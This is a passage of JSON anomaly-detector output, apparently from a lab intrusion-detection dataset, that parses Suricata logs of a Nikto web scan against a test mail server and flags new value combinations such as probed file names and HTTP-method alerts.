combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.194537, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46806, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2223921164907347, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80", "/parser/model/time": 1583349514.197206, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46808, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tcl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.19741, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":728237458783181,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46808, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":728237458783181,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 728237458783181, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80", "/parser/model/time": 1583349514.199492, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46810, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sys", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.199703, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46810, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1995991545415704, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": 